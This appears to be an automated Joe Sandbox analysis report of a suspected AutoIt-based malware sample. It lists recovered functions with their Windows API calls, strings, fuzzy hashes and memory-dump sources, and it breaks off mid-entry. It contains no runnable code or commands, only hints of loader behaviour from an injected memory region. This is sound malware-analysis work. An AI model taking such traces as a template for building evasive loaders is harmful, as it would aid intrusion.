Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 1c208afa991681841e3f9611aafaf61b10723cef47d6d0eb3dff69c050fa1979
Instruction ID: 0254d1461907ff7cf84ce17f184151ec0e04ae6a7e4934026d36958d21087593
Opcode Fuzzy Hash: 1c208afa991681841e3f9611aafaf61b10723cef47d6d0eb3dff69c050fa1979
Instruction Fuzzy Hash: D1A12B7291022A9ACB04EBA4DC91FEEB77CFF14300F54052AF55AA71D1DB75AA09CB70

Function 00B40920 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00B40965

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: c59f46ce0e3eac3669f22871298b4f873d34d1b77dedac1ece53c7e73ab14d72
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: CE51F775A50208FBEF20EFA4CC89FDE77B9EF48700F108554F64AEA180DA749B449B60

Function 00D039E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D03A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D03A36
ShowWindow.USER32(00000000,?,?), ref: 00D03A4A
ShowWindow.USER32(00000000,?,?), ref: 00D03A53

Strings

AutoIt v3, xrefs: 00D03A0D, 00D03A12, 00D03A13
edit, xrefs: 00D03A30

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 63700c7057d4dc8055f22fa1bad1977510a066933fa7a1050c536404dfd5bcb6
Instruction ID: de9c0a99f97a3f91a265d6a878938b19dc16a03eb88bdb236ff8d264159a0118
Opcode Fuzzy Hash: 63700c7057d4dc8055f22fa1bad1977510a066933fa7a1050c536404dfd5bcb6
Instruction Fuzzy Hash: 7BF03A706003927EEA301723AC48E277E7DD7C6F50B10002AB900E2371C2B54841CAB8

Function 00D0410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D3D5EC

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

_memset.LIBCMT ref: 00D0418D
_wcscpy.LIBCMT ref: 00D041E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D041F1

Strings

Line: , xrefs: 00D3D615

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 1207a18636df91c0f956c7ef40f11bf3d463341475b5dc413e24ef4d2cfce687
Instruction ID: 32353ef8d4fd6cde9acd64862ef6bb2585b2d2cabf23fd672b7f13ca5f695eca
Opcode Fuzzy Hash: 1207a18636df91c0f956c7ef40f11bf3d463341475b5dc413e24ef4d2cfce687
Instruction Fuzzy Hash: DB31C171508306AAD721EB60DC46FDFB7E8EF54300F10461EB189961E1EB70A648CBB7

Function 00D2564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00D256AB
_memcpy_s.LIBCMT ref: 00D2571D
__read_nolock.LIBCMT ref: 00D2577B
__filbuf.LIBCMT ref: 00D2579E
_memset.LIBCMT ref: 00D257E2

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: c2102f9991d268fa8b3e76261ef7e84b486882ea5b0ade162f5c4b44446fca6d
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: DA51B730A00B25DBDB248F69F884E6E77A1EF60329F288729F825971D8D7709D548B70

Function 00D069CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D04F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00DC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D04F6F

_free.LIBCMT ref: 00D3E68C
_free.LIBCMT ref: 00D3E6D3

Part of subcall function 00D06BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D06D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00D3E462
Bad directive syntax error, xrefs: 00D3E6BB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: d418970c1ac7abfe899a48ceacffa359506e6a8dd510e78fda26c3d5f0fa4944
Instruction ID: 2844d89e97229864d339d2b4abadcbc7aede82c1b12029ccf68f1eb5fe84bdb6
Opcode Fuzzy Hash: d418970c1ac7abfe899a48ceacffa359506e6a8dd510e78fda26c3d5f0fa4944
Instruction Fuzzy Hash: A9911871910219AFCF04EFA4D891AEDBBB4FF19314F14446AE816AB2D1EB30A915CB70

Function 00B42390 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B42280: Sleep.KERNELBASE(000001F4), ref: 00B42291

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B424C4

Strings

BXZBS0WSNM7NJU0IO6QRFQ6, xrefs: 00B42544, 00B42547

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateFileSleep
String ID: BXZBS0WSNM7NJU0IO6QRFQ6
API String ID: 2694422964-3646873508
Opcode ID: 9a1f46ac4404d5a4a8b102eb9b0d7213794e66bb1500a64b67d650d9eecca28f
Instruction ID: 5ee96017dec848526a68f0c21e5b4cb0d6fdd55917bac08e9ebf7e11f2f5f78a
Opcode Fuzzy Hash: 9a1f46ac4404d5a4a8b102eb9b0d7213794e66bb1500a64b67d650d9eecca28f
Instruction Fuzzy Hash: AB61A430D04288DAEF11DBB4C859BEEBBB4AF15304F144199E648BB2C1D6B91B44DBA5

Function 00D035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D035A1,SwapMouseButtons,00000004,?), ref: 00D035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00D035A1,SwapMouseButtons,00000004,?,?,?,?,00D02754), ref: 00D035F5
RegCloseKey.KERNELBASE(00000000,?,?,00D035A1,SwapMouseButtons,00000004,?,?,?,?,00D02754), ref: 00D03617

Strings

Control Panel\Mouse, xrefs: 00D035D2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: f07f8f617ccb2142ca5a9d9de81aeaab773508ff883cf0b619df1082929c6042
Instruction ID: 333a9b3d03525c072871ad61b5a0e6277f35ec69a48cf6f67ee612a8178e94ce
Opcode Fuzzy Hash: f07f8f617ccb2142ca5a9d9de81aeaab773508ff883cf0b619df1082929c6042
Instruction Fuzzy Hash: FE115771610208BFDB208F64DC80EAEBBBCEF04740F548469F809D7250E6729F40ABB0

Function 00D697E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00D05045: _fseek.LIBCMT ref: 00D0505D

Part of subcall function 00D699BE: _wcscmp.LIBCMT ref: 00D69AAE
Part of subcall function 00D699BE: _wcscmp.LIBCMT ref: 00D69AC1

_free.LIBCMT ref: 00D6992C
_free.LIBCMT ref: 00D69933
_free.LIBCMT ref: 00D6999E

Part of subcall function 00D22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00D29C64), ref: 00D22FA9
Part of subcall function 00D22F95: GetLastError.KERNEL32(00000000,?,00D29C64), ref: 00D22FBB

_free.LIBCMT ref: 00D699A6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: fdb1b677d3d530412529e0752f646890b5ec8f967bc406859083aa4d9e012e05
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: F45150B1904218AFDF249F64DC41BAEBB79EF48310F1404AEB649A7281DB715E80CF78

Function 00D2493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D249D0
__flush.LIBCMT ref: 00D249F0
__write.LIBCMT ref: 00D24A23
__flsbuf.LIBCMT ref: 00D24A51

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 4e96cb8f981096b85d113535959d89ce14a153ab137851d901db043771b2adec
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: C641E5706006259BDF28CEA9E8809AF77A6EFA436CB28813DEC55C7640D771DD808B74

Function 00D073E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D3EE62
GetOpenFileNameW.COMDLG32(?), ref: 00D3EEAC

Part of subcall function 00D048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D048A1,?,?,00D037C0,?), ref: 00D048CE

Part of subcall function 00D209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D209F4

Strings

X, xrefs: 00D3EE7A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 707e15be6dcc343b169911c1e835b209eac6a61da0910959b3733d6f7dd84aa7
Instruction ID: 496df17023088ee4c951ff90c2a7c693d810b2af439bcd8a5724545241946a7f
Opcode Fuzzy Hash: 707e15be6dcc343b169911c1e835b209eac6a61da0910959b3733d6f7dd84aa7
Instruction Fuzzy Hash: 9D21C371A142989BCB01DF94C845BEEBBF8DF49314F04405AE509EB381DBB4998A8FB1

Function 00D6901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D69036
__fread_nolock.LIBCMT ref: 00D6904B

Strings

EA06, xrefs: 00D6907D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: c5ac07cb9c53d99f62055807a9ab26672c8859dec312dccd53129f524954f27f
Instruction ID: 0266b0e4f3a4e30544ca27c248850a40f8480b716b105590e54b40204b220f77
Opcode Fuzzy Hash: c5ac07cb9c53d99f62055807a9ab26672c8859dec312dccd53129f524954f27f
Instruction Fuzzy Hash: 7D01B971904268AEDB28C6A8D856EFEBBFCDB15315F00419AF552D2181E5B5E6088B70

Function 00B41000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00B41045
ExitProcess.KERNEL32(00000000), ref: 00B41064

Strings

D, xrefs: 00B41011

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction ID: 01efe5bb12c3841f86c03be50bdcbf24f6bbcc0ff622d7a4e557c8883a00d670
Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction Fuzzy Hash: 33F0FF7594024CABDB60DFE4CC49FEE77BCBF04701F508548FB0A9A180DB7896489B61

Function 00D69B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00D69B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00D69B99

Strings

aut, xrefs: 00D69B93

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 981793002edcc9d83df127b9773feeb24af879e0478655bc20ce295ad157783f
Instruction ID: 76b942a4701497b4b1987c00ac661ea1036cde1516d355690d243d2da0be0f8b
Opcode Fuzzy Hash: 981793002edcc9d83df127b9773feeb24af879e0478655bc20ce295ad157783f
Instruction Fuzzy Hash: 32D05E7994030DABDB509B94DC4EFDA772CE704704F0046A1BE58D11A1DEB155988BA5

Function 00D7CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27cfb8617ef28356a21dd9c417aa2015e89caaaefcf3b983e2eaf2525498314
Instruction ID: 844188dc1ee744d5d6f020743d93292b688aa980fd26fe891b1731ba027aeba8
Opcode Fuzzy Hash: f27cfb8617ef28356a21dd9c417aa2015e89caaaefcf3b983e2eaf2525498314
Instruction Fuzzy Hash: 58F119716083019FC714DF28C484A6ABBE5FF88314F54892DF8999B352E771E946CFA2

Function 00D0F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D203D3
Part of subcall function 00D203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D203DB
Part of subcall function 00D203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D203E6
Part of subcall function 00D203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D203F1
Part of subcall function 00D203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D203F9
Part of subcall function 00D203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D20401

Part of subcall function 00D16259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00D0FA90), ref: 00D162B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D0FB2D
OleInitialize.OLE32(00000000), ref: 00D0FBAA
CloseHandle.KERNEL32(00000000), ref: 00D449F2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 4fad58cf47f96d4261ef1d0a891965ac801e80a130bf2a5f196cef4bc75d1b6d
Instruction ID: f91761f007aa6cdc4ccb6284c644993ba1724a30b6e773e172c28e7ef8915d15
Opcode Fuzzy Hash: 4fad58cf47f96d4261ef1d0a891965ac801e80a130bf2a5f196cef4bc75d1b6d
Instruction Fuzzy Hash: 0E8194B090C3839EC788EF69E954E157AE4EB98708324892EE019C73A6EB75C405CF31

Function 00D043DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D04401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D044A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D044C3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 11fff8d2de1bad746f91315b0226ba8e23e15a5c54a8124524942481a8a7a738
Instruction ID: 01fe4a37506e38c4e6f66d54ea7c23bdbf1991cbd203dcf722bf328866f058ab
Opcode Fuzzy Hash: 11fff8d2de1bad746f91315b0226ba8e23e15a5c54a8124524942481a8a7a738
Instruction Fuzzy Hash: D43150B15047029FD720DF64D884B9BBBE8FB48304F04092EE69AC3291D7B5A944CBB6

Function 00D2594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00D25963

Part of subcall function 00D2A3AB: __NMSG_WRITE.LIBCMT ref: 00D2A3D2
Part of subcall function 00D2A3AB: __NMSG_WRITE.LIBCMT ref: 00D2A3DC

__NMSG_WRITE.LIBCMT ref: 00D2596A

Part of subcall function 00D2A408: GetModuleFileNameW.KERNEL32(00000000,00DC43BA,00000104,?,00000001,00000000), ref: 00D2A49A
Part of subcall function 00D2A408: ___crtMessageBoxW.LIBCMT ref: 00D2A548

Part of subcall function 00D232DF: ___crtCorExitProcess.LIBCMT ref: 00D232E5
Part of subcall function 00D232DF: ExitProcess.KERNEL32 ref: 00D232EE

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00D21013,?), ref: 00D2598F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 45440eeaaa78547bee8115b41bc72ba87f86e9c9c04c676436c925d31036f3c4
